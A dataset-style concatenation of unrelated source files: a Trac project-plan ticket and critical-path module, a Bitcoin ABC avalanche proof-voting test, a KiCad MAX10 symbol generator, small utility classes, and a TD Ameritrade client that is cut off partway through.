label = get_label(org)
return (org, label) | 2.125 | 2 |
trac/Lib/site-packages/projectplan-0.93.0-py2.7-patched.egg/projectplan/pptickets.py | thinkbase/PortableTrac | 2 | 12767435 | <reponame>thinkbase/PortableTrac<gh_stars>1-10
# -*- coding: utf-8 -*-
import datetime
import pputil
from trac.util.datefmt import to_datetime, utc
from trac.ticket.model import Ticket
class TSExtensionRegister(object):
'''
TicketSet Extension Register
'''
# TODO: Class for Render/TicketSet Extension, with Documentation such that
# Documentation can be generated for the Macro (Trac WikiMacro Listing)
__r = {}
@classmethod
def add(cls,registrantcls,registername):
'''
Add a TSExtension:Name pair into the Register
'''
cls.__r[ registername ] = registrantcls
@classmethod
def keys(cls):
'''
Enumerate the Names
'''
return cls.__r.keys()
@classmethod
def get(cls,registername):
'''
Get the Matching Extension for a given Name
'''
return cls.__r[ registername ]
class ppTicket():
'''
Project Plan Ticket Class for extended Ticket Attributes
'''
def __init__(self,dataref,ticketset):
'''
initialize ticket object with data reference (dict with stored ticket data) and
ticketset (ppTicketSet object which holds this object)
'''
self.__dataref = dataref
self.__extensions = dict()
def hasfield(self,name):
'''
check wether ticketdata has a key <name>
'''
return name in self.__dataref
def getfield(self,name):
'''
return ticketdata for key <name>
'''
return self.__dataref[ name ]
def getfielddefs( self ):
'''
return the set of valid fields
'''
#return self.__dataref.keys()
return TicketSet.getfielddefs()
def getfielddef(self,name,defval):
'''
return ticketdata for key <name> or default if theres no data
'''
if self.hasfield(name) and self.getfield(name):
return self.__dataref[ name ]
else:
return defval
def hasextension(self,name):
'''
check wether ticket extension with key <name> exists
'''
return name in self.__extensions
def getextension(self,name):
'''
return ticket extension for key <name> or None
'''
if self.hasextension( name ):
return self.__extensions[ name ]
else:
return None
def _setextension(self,name,data):
'''
set an extension field
'''
self.__extensions[ name ] = data
def _delextension(self,name):
'''
delete an extension field (which is f.e. temporary used for an extension)
'''
del self.__extensions[ name ]
def get_changelog( self ):
t = Ticket(self.env, id)
return( t.get_changelog() )
def getstatus( self ):
'''
return status of ticket
'''
return self.getfield('status')
def getpriority( self ) :
'''
return priority of ticket
'''
return self.getfield('priority')
class ppTicketSet():
def __init__(self, macroenv):
'''
Initialize the ppTicketSet
'''
self.__extensions = dict()
self.macroenv = macroenv
self.__tickets = dict()
def addTicket(self,ticket):
'''
add a new ticket with ticket data <ticket>
'''
#self.macroenv.tracenv.log.debug('addTicket: '+repr(ticket) )
self.__tickets[ ticket['id'] ] = ppTicket(ticket,self)
def deleteTicket(self,ticket):
'''
remove a new ticket with ticket data <ticket>
'''
self.deleteTicketId(ticket['id'])
def deleteTicketId(self, tid):
try:
del self.__tickets[ tid ]
except:
pass
@classmethod
def getfielddefs( self ):
return [ f['name'] for f in TicketSystem( self.macroenv.tracenv ).get_ticket_fields() ]
def getIDList(self):
'''
return a list of ticket ids of tickets in this set
'''
return self.__tickets.keys();
def getIDSortedList(self):
'''
return a sorted list of ticket ids of tickets in this set
'''
idlist = self.__tickets.keys();
idlist.sort()
return idlist
def getTicket(self,id):
'''
return the ppTicket object for a ticket with id <id>
'''
try:
return self.__tickets[ id ]
except KeyError:
raise Exception('ticket not available: #%s (maybe increase the value of max_ticket_number_at_filters)' % (id,))
def hasExtension(self,name):
'''
check wether ticketset extension with key <name> exists
'''
return name in self.__extensions
def getExtension(self,name):
'''
return ticketset extension for key <name> or None
'''
if self.hasExtension( name ):
return self.__extensions[ name ]
else:
return None
def needExtension(self,name):
'''
execute an extension on this ticketset
'''
if self.hasExtension( name ):
return
else:
if name in TSExtensionRegister.keys():
extcls = TSExtensionRegister.get( name )
if (extcls!=None):
extensiono = extcls( self, self.__tickets )
if (extensiono!=None):
exttsdata = extensiono.extend()
self.__extensions[ name ] = exttsdata
return
raise TracError( 'extension "%s" went missing or failed' % name )
def get_changelog( self , ticketid):
t = Ticket(self.macroenv.tracenv, ticketid)
try:
return( t.get_changelog() )
except:
self.macroenv.tracenv.log.warn("get_changelog failed on ticket %s", ticketid)
return [] # no changelogs
class ppTicketSetExtension():
'''
Base Class for TicketSet Extensions
'''
def __init__(self,ticketset,ticketsetdata):
pass
def extend(self):
'''
Execute the Extension and Extend Tickets and/or TicketSet with
Extension fields. Return anything except None to Mark this extension
as Executed. The Value will be put in the matching extension field for
this Extension.
'''
return True
TSExtensionRegister.add( ppTicketSetExtension, 'base' )
class ppTSLastChange( ppTicketSetExtension ):
'''
Get the Last Ticket Changetime
'''
def __init__(self,ticketset,ticketsetdata):
self.__ts = ticketsetdata
def extend(self):
'''
Check for all Changetimes and Return the highest Changetime as
Int
'''
timemax = to_datetime( 0, utc )
timenow = to_datetime( datetime.datetime.now(utc) )
for k in self.__ts:
v = self.__ts[ k ]
ticketdt = to_datetime( v.getfielddef( 'changetime', timenow ) )
if ticketdt > timemax:
timemax = ticketdt
if timemax == timenow:
break
return timemax
TSExtensionRegister.add( ppTSLastChange, 'tslastchange' )
class ppTSSetOfField( ppTicketSetExtension ):
'''
Generate a Set (List of non-duplicate Values), for
a given Field.
'''
FieldName = ''
DefValue = ''
def __init__(self,ticketset,ticketsetdata):
'''
Get the Ticketdata
'''
self.__ts = ticketsetdata
def extend(self):
'''
Put all Values into a Set and Sort it.
Return the Sorted Set for values of the given field.
'''
vset = set()
for k in self.__ts:
vset.add( self.__ts[ k ].getfielddef( self.FieldName, self.DefValue ) )
return sorted( vset )
class ppTSVersions( ppTSSetOfField ):
'''
Generate a Sorted Set for the Version field
'''
FieldName = 'version'
TSExtensionRegister.add( ppTSVersions, 'tsversions' )
class ppTSMilestones( ppTSSetOfField ):
'''
Generate a Sorted Set for the Milestone field
'''
FieldName = 'milestone'
TSExtensionRegister.add( ppTSMilestones, 'tsmilestones' )
class ppTSDependencies( ppTicketSetExtension ):
'''
Generate a Dependency List which holds ppTicket Instances for the
current TicketSet and another List which holds IDs for those
Dependencies, which cant be resolved. (either because the
there is no Instance for this Ticket in the current TicketSet or the
Ticket with the given ID does not exist)
'''
def __init__(self,ticketset,ticketsetdata):
self.__tso = ticketset
self.__ts = ticketsetdata
def extend(self):
'''
Calculate the field dependencies, which holds ppTicket Instances
and the field all_dependencies which holds all given Ticket IDs, written
in the dependency field for the current Ticket.
'''
depfield = self.__tso.macroenv.conf.get( 'custom_dependency_field' )
for k in self.__ts:
v = self.__ts[ k ]
intset = pputil.ticketIDsFromString( v.getfielddef( depfield, '' ) )
v._setextension( 'all_dependencies', intset )
depset = set()
for d in intset:
if d in self.__ts:
depset.add( self.__ts[ d ] )
v._setextension( 'dependencies', depset )
return True
TSExtensionRegister.add( ppTSDependencies, 'dependencies' )
class ppTSReverseDependencies( ppTicketSetExtension ):
'''
Calculate the reverse Dependencies for the dependencies extension field.
This is a list of ppTicket Instances. The reverse dependencies field
is also depending on the given TicketSet. Tickets not in this set, cant be
set as reverse dependencies!
'''
def __init__(self,ticketset,ticketsetdata):
self.__ts = ticketsetdata
ticketset.needExtension( 'dependencies' )
def extend(self):
'''
calculate the reverse_dependencies field based on the dependencies field.
'''
for k in self.__ts:
self.__ts[ k ]._setextension( 'reverse_dependencies', set() )
# reverse dependency calculation
for k in self.__ts:
v = self.__ts[ k ]
for d in v.getextension( 'dependencies' ):
d.getextension( 'reverse_dependencies' ).add( v )
return True
TSExtensionRegister.add( ppTSReverseDependencies, 'reverse_dependencies' )
class ppTSDueTimes( ppTicketSetExtension ):
'''
Calculate the time values.
First, convert the given Text for Assign/Close Time into DateTime Values.
Second, calculate Worktime / Assigndelay / Closingdelay without
accessing the Database.
Third, calculate Start and Finish Dates.
'''
def __init__(self,ticketset,ticketsetdata):
'''
Initialize with ticketset, ticketdata and calculate dependencies
'''
self.__tso = ticketset
self.__ts = ticketsetdata
if not ticketset.needExtension( 'dependencies' ):
self = None
def fieldtodatetime(self,v,field,dtf):
'''
convert a field, with given day/month/year mask into
a datetime value
'''
theDate = v.getfielddef( field, 'DD/MM/YYYY' )
if theDate != '' and theDate != 'MM/DD/YYYY' and theDate != 'DD/MM/YYYY':
AtheDate = None
if dtf == 'DD/MM/YYYY':
AtheDate = theDate.split('/');
day_key = 0;
month_key = 1;
year_key = 2;
if dtf == 'MM/DD/YYYY':
AtheDate = theDate.split('/');
month_key = 0;
day_key = 1;
year_key = 2;
if dtf == 'DD.MM.YYYY':
AtheDate = theDate.split('.');
day_key = 0;
month_key = 1;
year_key = 2;
if dtf == 'YYYY-MM-DD':
AtheDate = theDate.split('-');
year_key = 0;
month_key = 1;
day_key = 2;
try:
if AtheDate and len(AtheDate) == 3:
year=int(AtheDate[year_key]);
month=int(AtheDate[month_key]);
day=int(AtheDate[day_key]);
#return datetime.datetime(year,month,day)
return datetime.date(year,month,day) # catch 64 bit problem
except:
# a problem appears, while parsing the date field
# TODO: raise error message
pass
return None
def extend(self):
'''
Calculate Datetime Values for Assign and Closing Time,
calculate the difference to the current time in days and attach
them into assigndiff and closingdiff extension fields for each ticket.
Calculate the Workload (closing-assigntime) or set a Defaultworkload.
Calculate start and finish Dates for each ticket, where both are
either depending on the assign and closing time when it is on time or
calculate start/finish date from now, such that workload is always the same,
but start and finish are moving on overdue.
no time is calculated, when both assign and close time are not given.
(there is no dependency usage in the time calculation)
'''
adatefield = self.__tso.macroenv.conf.get( 'custom_due_assign_field' )
cdatefield = self.__tso.macroenv.conf.get( 'custom_due_close_field' )
adateformat = self.__tso.macroenv.conf.get( 'ticketassignedf' )
cdateformat = self.__tso.macroenv.conf.get( 'ticketclosedf' )
#dateNow = datetime.datetime.today()
dateNow = datetime.date.today() # catch 64 bit problems
for k in self.__ts:
v = self.__ts[ k ]
# set datetime values for assign/close - those can be None!
adateTicket = self.fieldtodatetime( v, adatefield, adateformat )
cdateTicket = self.fieldtodatetime( v, cdatefield, cdateformat )
# defaultvalue -> conf
defworktime = 1
if adateTicket:
v._setextension( 'assigndiff', (dateNow - adateTicket ).days )
if cdateTicket:
v._setextension( 'closingdiff', (dateNow - cdateTicket ).days )
if (cdateTicket!=None) and (adateTicket!=None):
v._setextension( 'worktime', ( cdateTicket - adateTicket ).days )
else:
v._setextension( 'worktime', defworktime )
ptimedelta = datetime.timedelta( days = defworktime )
if (cdateTicket!=None) or (adateTicket!=None):
if cdateTicket:
adateTicket = cdateTicket - ptimedelta
if adateTicket:
cdateTicket = adateTicket + ptimedelta
if ( not v.hasextension( 'assigndiff' ) ) or ( not v.hasextension( 'closingdiff' ) ):
if v.hasextension( 'assigndiff' ):
v._setextension( 'closingdiff', v.getextension( 'assigndiff' ) - defworktime )
if v.hasextension( 'closingdiff' ):
v._setextension( 'assigndiff', v.getextension( 'closingdiff' ) + defworktime )
if (adateTicket!=None) and (cdateTicket!=None):
###### static workload calculation
if ( v.getextension( 'assigndiff' ) > 0 ) or ( v.getextension( 'closingdiff' ) > 0 ):
if v.getextension( 'assigndiff' ) > 0:
ptimedelta = datetime.timedelta( days = v.getextension( 'assigndiff' ) )
adateTicket = adateTicket + ptimedelta
cdateTicket = cdateTicket + ptimedelta
else:
ptimedelta = datetime.timedelta( days = v.getextension( 'closingdiff' ) )
cdateTicket = cdateTicket + ptimedelta
######
v._setextension( 'startdate', adateTicket )
v._setextension( 'finishdate', cdateTicket )
return True
TSExtensionRegister.add( ppTSDueTimes, 'duetimediffs' )
# Berechnung fuer End und Start Ticket in die Kritische Pfadanalyse einfuegen
# -- pseudotickets einfuegen
# -- berechnung
# -- pseudotickets wieder entfernen und dependencies/reversedependencies/start/ende in ticketset extension feldern speichern
# das ermoeglicht es die abhaengigkeiten in den grapviz renderern nachtraeglich einzubauen
class ppTSCriticalPathSimple( ppTicketSetExtension ):
BETickets_Begin = 999999
BETickets_End = 1000000
def __init__(self,ticketset,ticketsetdata):
self.__ts = ticketsetdata
self.ticketset = ticketset
self.ticketset.needExtension( 'dependencies' )
self.ticketset.needExtension( 'reverse_dependencies' )
self.ticketset.needExtension( 'duetimediffs' )
def _inject_start_end(self ):
'''
Add Pseudo Project Begin and End Tickets
- Begin Ticket has the Time t1 of earliest Ticket or
now if now < t1
- End Ticket has the Time t2 of latest Ticket or
now if t2 < now
'''
# get the starting tickets
starts = set()
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'dependencies' )) <= 0:
starts.add( self.__ts[ k ] )
dateNow = datetime.datetime.today()
# add the pseudo ticket
dateStart = dateNow
for t in starts:
if t.hasextension( 'startdate' ) and (
t.getextension( 'startdate' ) != None ) and (
t.getextension( 'startdate' ) < dateStart ):
dateStart = t.getextension( 'startdate' )
if dateStart < dateNow:
pseudostat = 'closed'
else:
pseudostat = 'new'
pseudoticket = { 'id' : self.BETickets_Begin,
'status': pseudostat }
self.ticketset.addTicket( pseudoticket )
# add extensions to the new pseudo ticket
ppstartticket = self.__ts[ self.BETickets_Begin ]
ppstartticket._setextension( 'dependencies', set() )
ppstartticket._setextension( 'reverse_dependencies', starts )
ppstartticket._setextension( 'startdate', dateStart )
ppstartticket._setextension( 'finishdate', dateStart )
# fix dependencies for "old" starting tickets
for t in starts:
t.getextension( 'dependencies' ).add( ppstartticket )
# reverse procedure for the end ticket
ends = set()
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'reverse_dependencies' )) <= 0:
ends.add( self.__ts[ k ] )
# add the pseudo ticket
dateEnd = dateNow
for t in ends:
if t.hasextension( 'finishdate' ) and (
t.getextension( 'finishdate' ) != None ) and (
t.getextension( 'finishdate' ) > dateEnd ):
dateEnd = t.getextension( 'finishdate' )
pseudostat = 'new'
pseudoticket = { 'id' : self.BETickets_End,
'status': pseudostat }
self.ticketset.addTicket( pseudoticket )
# add extensions to the new pseudo ticket
ppendticket = self.__ts[ self.BETickets_End ]
ppendticket._setextension( 'dependencies', ends )
ppendticket._setextension( 'reverse_dependencies', set() )
ppendticket._setextension( 'startdate', dateEnd )
ppendticket._setextension( 'finishdate', dateEnd )
# fix dependencies for "old" starting tickets
for t in ends:
t.getextension( 'reverse_dependencies' ).add( ppendticket )
def _cleanup_start_end(self ):
# prepare results - because both start and end are critical and buffers
# are set in inner Tickets, the usefull data is time/dependencies
result = { 'starts': self.__ts[ self.BETickets_Begin ].getextension( 'reverse_dependencies' ),
'startdate': self.__ts[ self.BETickets_Begin ].getextension( 'startdate' ),
'ends': self.__ts[ self.BETickets_End ].getextension( 'dependencies' ),
'enddate': self.__ts[ self.BETickets_End ].getextension( 'finishdate' ) }
# remove reverse_dependencies from starttickets (just empty them, they where empty before!)
for t in result[ 'starts' ]:
t._setextension( 'dependencies', set() )
# same for end tickets + cleanup the mindepbuffer extension field which references the nonexisting endticket
for t in result[ 'ends' ]:
t._setextension( 'reverse_dependencies', set() )
if t.hasextension( 'mindepbuffers' ):
t._setextension( 'mindepbuffers', [] )
# remove the pseudo tickets
del self.__ts[ self.BETickets_Begin ]
del self.__ts[ self.BETickets_End ]
return result
def extend(self):
betickets = "betickets" in self.ticketset.macroenv.macroargs
if betickets:
self._inject_start_end()
# pass 1, check for start and finish dates
for k in self.__ts:
v = self.__ts[ k ]
if (not v.hasextension( 'startdate' )) or (not v.hasextension( 'finishdate' )):
if betickets:
self._cleanup_start_end()
return False
# pass 2. get the first nodes for topological run
queue = []
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'dependencies' )) <= 0:
queue.append( k )
# pass 3. breadth first topological run, calculate buffer times per dependency
while len(queue)>0:
current = queue.pop(0)
if not self.__ts[ current ].hasextension( 'depbuffers' ):
deps = self.__ts[ current ].getextension( 'reverse_dependencies' )
depbuffers = []
for d in deps:
if d.getfielddef( 'status', '' )!='closed':
if self.__ts[ current ].getfielddef( 'status', '' )!='closed':
depbuffer = ( d.getfield('id'), ( d.getextension( 'startdate' ) - self.__ts[ current ].getextension( 'finishdate' ) ).days )
else:
depbuffer = ( d.getfield('id'), ( d.getextension( 'startdate' ) - self.__ts[ current ].getextension( 'startdate' ) ).days )
else:
depbuffer = ( d.getfield('id'), 0 )
depbuffers.append( depbuffer )
queue.append( d.getfield('id') )
self.__ts[ current ]._setextension( 'depbuffers', depbuffers )
# pass 4. get the first nodes for reverse run
queue = []
for k in self.__ts:
if len(self.__ts[ k ].getextension( 'depbuffers' )) <= 0:
queue.append( k )
# pass 5. breadth first in reverse order, calculate the deps with min. cumulative buffers
runtest = 0; # var for endless loop check (cyclic dependencies in graph)
startnode_minbuffer = 36500
while ( len(queue) > 0 ) and (runtest <= ( 3*len( queue ) ) ):
current = queue.pop(0)
if not self.__ts[ current ].hasextension( 'mindepbuffers' ):
depbufs = self.__ts[ current ].getextension( 'depbuffers' )
depbufsresolved = True
for (k,buf) in depbufs:
if not self.__ts[ k ].hasextension( 'mindepbuffers' ):
depbufsresolved = False
break
if not depbufsresolved:
# dependend buffermins are not calculated, recycle the current node for later testing
queue.append( current )
runtest = runtest +1
else:
runtest = 0
for d in self.__ts[ current ].getextension( 'dependencies' ):
queue.append( d.getfield('id') )
mindepbuffers = []
if len(depbufs)>0:
minbuf = 36500
for (k,buf) in depbufs:
cbuf = ( buf + self.__ts[ k ].getextension( 'buffer' ) )
if cbuf < minbuf:
minbuf = cbuf
self.__ts[ current ]._setextension( 'buffer', minbuf )
if len(self.__ts[ current ].getextension( 'dependencies' )) <= 0:
if minbuf < startnode_minbuffer:
startnode_minbuffer = minbuf
for (k,buf) in depbufs:
cbuf = ( buf + self.__ts[ k ].getextension( 'buffer' ) )
if cbuf <= minbuf:
mindepbuffers.append( k )
else:
self.__ts[ current ]._setextension( 'buffer', 0 )
self.__ts[ current ]._setextension( 'mindepbuffers', mindepbuffers )
else:
runtest = 0
if len(queue) > 0:
raise Exception( " Cyclic dependencies found, fix dependencies or remove critical path analysis " )
#return False
# pass 6. get the first nodes for min buffer pathes
queue = []
for k in self.__ts:
if ( len(self.__ts[ k ].getextension( 'dependencies' )) <= 0 ) and ( self.__ts[ k ].getextension( 'buffer' ) <= startnode_minbuffer):
queue.append( k )
# pass 7. mark the critical path
while len(queue) > 0:
current = queue.pop(0)
self.__ts[ current ]._setextension( 'critical', True )
for d in self.__ts[ current ].getextension( 'mindepbuffers' ):
queue.append( d )
# cleanup depbuffers
for k in self.__ts:
if self.__ts[ k ].hasextension( 'depbuffers' ):
self.__ts[ k ]._delextension( 'depbuffers' )
if betickets:
return self._cleanup_start_end()
else:
return True
TSExtensionRegister.add( ppTSCriticalPathSimple, 'criticalpath_simple' )
| 2.09375 | 2 |
test/functional/abc_p2p_avalanche_proof_voting.py | johnkuney/bitcoin-abc | 0 | 12767436 | #!/usr/bin/env python3
# Copyright (c) 2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the resolution of conflicting proofs via avalanche."""
import time
from test_framework.avatools import (
create_coinbase_stakes,
gen_proof,
get_ava_p2p_interface,
get_proof_ids,
)
from test_framework.key import ECPubKey
from test_framework.messages import (
AvalancheVote,
AvalancheVoteError,
FromHex,
LegacyAvalancheProof,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error, try_rpc
from test_framework.wallet_util import bytes_to_wif
QUORUM_NODE_COUNT = 16
class AvalancheProofVotingTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.conflicting_proof_cooldown = 100
self.peer_replacement_cooldown = 2000
self.extra_args = [
['-enableavalanche=1', '-enableavalancheproofreplacement=1',
f'-avalancheconflictingproofcooldown={self.conflicting_proof_cooldown}', f'-avalanchepeerreplacementcooldown={self.peer_replacement_cooldown}', '-avacooldown=0'],
]
self.supports_cli = False
# Build a fake quorum of nodes.
def get_quorum(self, node):
quorum = [get_ava_p2p_interface(node)
for _ in range(0, QUORUM_NODE_COUNT)]
for n in quorum:
success = node.addavalanchenode(
n.nodeid,
self.privkey.get_pubkey().get_bytes().hex(),
self.quorum_proof.serialize().hex(),
)
assert success is True
return quorum
def can_find_proof_in_poll(self, hash, response):
found_hash = False
for n in self.quorum:
poll = n.get_avapoll_if_available()
# That node has not received a poll
if poll is None:
continue
# We got a poll, check for the hash and repond
votes = []
for inv in poll.invs:
# Vote yes to everything
r = AvalancheVoteError.ACCEPTED
# Look for what we expect
if inv.hash == hash:
r = response
found_hash = True
votes.append(AvalancheVote(r, inv.hash))
n.send_avaresponse(poll.round, votes, self.privkey)
return found_hash
@staticmethod
def send_proof(from_peer, proof_hex):
proof = FromHex(LegacyAvalancheProof(), proof_hex)
from_peer.send_avaproof(proof)
return proof.proofid
def send_and_check_for_polling(self, peer,
proof_hex, response=AvalancheVoteError.ACCEPTED):
proofid = self.send_proof(peer, proof_hex)
self.wait_until(lambda: self.can_find_proof_in_poll(proofid, response))
def build_conflicting_proof(self, node, sequence):
return node.buildavalancheproof(
sequence, 0, self.privkey_wif, self.conflicting_stakes)
def run_test(self):
node = self.nodes[0]
self.privkey, self.quorum_proof = gen_proof(node)
self.privkey_wif = bytes_to_wif(self.privkey.get_bytes())
self.quorum = self.get_quorum(node)
addrkey0 = node.get_deterministic_priv_key()
blockhash = node.generatetoaddress(10, addrkey0.address)
self.conflicting_stakes = create_coinbase_stakes(
node, blockhash[5:], addrkey0.key)
self.poll_tests(node)
self.update_tests(node)
def poll_tests(self, node):
proof_seq10 = self.build_conflicting_proof(node, 10)
proof_seq20 = self.build_conflicting_proof(node, 20)
proof_seq30 = self.build_conflicting_proof(node, 30)
proof_seq40 = self.build_conflicting_proof(node, 40)
orphan = node.buildavalancheproof(
100, 2000000000, self.privkey_wif, [{
'txid': '0' * 64,
'vout': 0,
'amount': 10e6,
'height': 42,
'iscoinbase': False,
'privatekey': self.privkey_wif,
}]
)
no_stake = node.buildavalancheproof(
200, 2000000000, self.privkey_wif, []
)
# Get the key so we can verify signatures.
avakey = ECPubKey()
avakey.set(bytes.fromhex(node.getavalanchekey()))
self.log.info("Trigger polling from the node...")
peer = get_ava_p2p_interface(node)
mock_time = int(time.time())
node.setmocktime(mock_time)
self.log.info("Check we poll for valid proof")
self.send_and_check_for_polling(peer, proof_seq30)
self.log.info(
"Check we don't poll for subsequent proofs if the cooldown is not elapsed, proof not the favorite")
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq20))
self.log.info(
"Check we don't poll for subsequent proofs if the cooldown is not elapsed, proof is the favorite")
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq40))
self.log.info(
"Check we poll for conflicting proof if the proof is not the favorite")
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(
peer, proof_seq20, response=AvalancheVoteError.INVALID)
self.log.info(
"Check we poll for conflicting proof if the proof is the favorite")
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(peer, proof_seq40)
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.log.info("Check we don't poll for orphans")
with node.assert_debug_log(["Not polling the avalanche proof (orphan-proof)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), orphan))
self.log.info("Check we don't poll for proofs that get rejected")
with node.assert_debug_log(["Not polling the avalanche proof (rejected-proof)"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), proof_seq10))
self.log.info("Check we don't poll for invalid proofs and get banned")
with node.assert_debug_log(["Misbehaving", "invalid-proof"]):
peer.send_avaproof(FromHex(LegacyAvalancheProof(), no_stake))
peer.wait_for_disconnect()
def update_tests(self, node):
# Restart the node to get rid og in-flight requests
self.restart_node(0)
mock_time = int(time.time())
node.setmocktime(mock_time)
self.quorum = self.get_quorum(node)
peer = get_ava_p2p_interface(node)
proof_seq30 = self.build_conflicting_proof(node, 30)
proof_seq40 = self.build_conflicting_proof(node, 40)
proof_seq50 = self.build_conflicting_proof(node, 50)
proofid_seq30 = FromHex(LegacyAvalancheProof(), proof_seq30).proofid
proofid_seq40 = FromHex(LegacyAvalancheProof(), proof_seq40).proofid
proofid_seq50 = FromHex(LegacyAvalancheProof(), proof_seq50).proofid
node.sendavalancheproof(proof_seq40)
self.wait_until(lambda: proofid_seq40 in get_proof_ids(node))
assert proofid_seq40 in get_proof_ids(node)
assert proofid_seq30 not in get_proof_ids(node)
self.log.info("Test proof acceptance")
def accept_proof(proofid):
self.wait_until(lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.ACCEPTED), timeout=5)
return proofid in get_proof_ids(node)
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
self.send_and_check_for_polling(peer, proof_seq30)
# Let the quorum vote for it
self.wait_until(lambda: accept_proof(proofid_seq30))
assert proofid_seq40 not in get_proof_ids(node)
self.log.info("Test the peer replacement rate limit")
# Wait until proof_seq30 is finalized
with node.assert_debug_log([f"Avalanche accepted proof {proofid_seq30:0{64}x}, status 3"]):
self.wait_until(lambda: not self.can_find_proof_in_poll(
proofid_seq30, response=AvalancheVoteError.ACCEPTED))
# Not enough
assert self.conflicting_proof_cooldown < self.peer_replacement_cooldown
mock_time += self.conflicting_proof_cooldown
node.setmocktime(mock_time)
peer = get_ava_p2p_interface(node)
with node.assert_debug_log(["Not polling the avalanche proof (cooldown-not-elapsed)"]):
self.send_proof(peer, proof_seq50)
mock_time += self.peer_replacement_cooldown
node.setmocktime(mock_time)
self.log.info("Test proof rejection")
self.send_proof(peer, proof_seq50)
self.wait_until(lambda: proofid_seq50 in get_proof_ids(node))
assert proofid_seq40 not in get_proof_ids(node)
def reject_proof(proofid):
self.wait_until(
lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.INVALID))
return proofid not in get_proof_ids(node)
self.wait_until(lambda: reject_proof(proofid_seq50))
assert proofid_seq50 not in get_proof_ids(node)
assert proofid_seq40 in get_proof_ids(node)
self.log.info("Test proof invalidation")
def invalidate_proof(proofid):
self.wait_until(
lambda: self.can_find_proof_in_poll(
proofid, response=AvalancheVoteError.INVALID))
return try_rpc(-8, "Proof not found",
node.getrawavalancheproof, f"{proofid:0{64}x}")
self.wait_until(lambda: invalidate_proof(proofid_seq50))
self.log.info("The node will now ignore the invalid proof")
for i in range(5):
with node.assert_debug_log(["received: avaproof"]):
self.send_proof(peer, proof_seq50)
assert_raises_rpc_error(-8,
"Proof not found",
node.getrawavalancheproof,
f"{proofid_seq50:0{64}x}")
if __name__ == '__main__':
AvalancheProofVotingTest().main()
| 2.0625 | 2 |
quoteline.py | G4me4u/typeformer | 0 | 12767437 | <reponame>G4me4u/typeformer<filename>quoteline.py
class QuoteLine:
def __init__(self, lineText, lineNumber, origin):
self.lineText = lineText
self.lineNumber = lineNumber
self.origin = origin
self.renderedLine = None
def renderLine(self, font, color):
'''
Renders the line using the given font and color.
'''
self.renderedLine = font.render(self.lineText, False, color)
def discardRenderedLine(self):
'''
Discards the rendered line (self.renderedLine = None)
'''
self.renderedLine = None | 2.53125 | 3 |
tests/integration/__init__.py | JawboneHealth/jhhalchemy | 2 | 12767438 | """
Integration tests
""" | 1.046875 | 1 |
src/max10_generate.py | krtkr/altera_kicad_gen | 0 | 12767439 | # -*- coding: utf-8 -*-
'''
Created on 20 июл. 2017 г.
@author: krtkr
'''
import sys
import getopt
from KicadSymGen.draw import Library
from KicadSymGen.generate import Generator
from KicadSymGen.generate import Layout
from KicadSymGen.parse.altera import Max10Reader
from KicadSymGen.parse.altera import Max10Parser
def print_help():
print('max10_generate.py -p <pinouts_path> -d <dcm_file> -l <lib_file>')
if __name__ == '__main__':
verbose = False
pinouts_path = "../docs/max10"
dcm_file_path = './max10.dcm'
lib_file_path = './max10.lib'
try:
opts, args = getopt.getopt(sys.argv[1:], "hvp:d:l:",["pinouts=","dcm=","lib="])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt == '-v':
verbose = True
elif opt in ("-p", "--pinouts"):
pinouts_path = arg
elif opt in ("-d", "--dcm_file"):
dcm_file_path = arg
elif opt in ("-l", "--lib_file"):
lib_file_path = arg
parse = Max10Parser(list())
layout = Layout()
max10Reader = Max10Reader(pinouts_path)
generator = Generator(max10Reader, parse, layout)
if generator.generate():
print("Done generating, write Library")
library = Library()
library.save(lib_file_path, dcm_file_path, generator.symbols)
print("Done writing Library, finish")
else:
print("Error: failed to generate")
pass
| 2.234375 | 2 |
utils/ConstantUtils.py | JoeBuzh/DeepWater | 1 | 12767440 | # -*- encoding: utf-8 -*-
'''
@Filename : ConstantUtils.py
@Datetime : 2020/09/27 17:10:12
@Author : Joe-Bu
@version : 1.0
'''
from enum import Enum
class MonitorItem(Enum):
"""
Water Monitoring Items.
"""
ITEMS = ['watertemp', 'pH', 'DO', 'conductivity', 'turbidity']
INDEX = ['codmn', 'nh3n', 'tp', 'tn']
@classmethod
def items_len(cls) -> int:
return len(MonitorItem.ITEMS.value)
@classmethod
def index_len(cls) -> int:
return len(MonitorItem.INDEX.value) | 2.734375 | 3 |
waldren/base/td_db_client.py | waldren/tradekit | 0 | 12767441 | from tda import auth, client
#from tda.orders import EquityOrderBuilder, Duration, Session
import json
import CONFIG as config
import datetime
from datetime import timedelta
import pandas as pd
import os
import sys
import psycopg2
class Client:
def __init__(self, config=config):
self.config = config
self.td = self.authenticate_tda()
self.conn = self.getDataBaseConnection()
# authenticate to TD Ameritrade API
def authenticate_tda(self):
try:
return auth.client_from_token_file(self.config.TOKEN_PATH, self.config.API_KEY)
except FileNotFoundError:
from selenium import webdriver
with webdriver.Chrome(executable_path=self.config.CHROME_DRIVER_PATH) as driver:
return auth.client_from_login_flow(
driver, self.config.API_KEY, self.config.REDIRECT_URL, self.config.TOKEN_PATH)
#Establish DB Connection
def getDataBaseConnection(self):
connection = psycopg2.connect(
host=self.config.DB_HOST,
